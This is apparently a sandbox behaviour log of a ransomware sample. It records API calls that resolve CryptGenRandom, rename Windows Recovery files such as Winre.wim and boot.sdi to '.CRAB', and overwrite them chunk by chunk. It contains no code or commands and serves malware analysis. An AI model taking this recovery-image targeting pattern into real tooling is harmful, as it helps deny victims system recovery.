Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
File Create filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\boot.sdi.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\boot.sdi.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\boot.sdi.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\boot.sdi.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\boot.sdi.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\boot.sdi.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\boot.sdi.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\boot.sdi.CRAB, size = 1048576, size_out = 24576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\boot.sdi.CRAB, size = 24576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\boot.sdi.CRAB, size = 256 True 2
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\boot.sdi.CRAB, size = 8 True 1
Fn
Data
File Get Info filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, type = file_attributes True 1
Fn
File Move source_filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, destination_filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
File Create filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
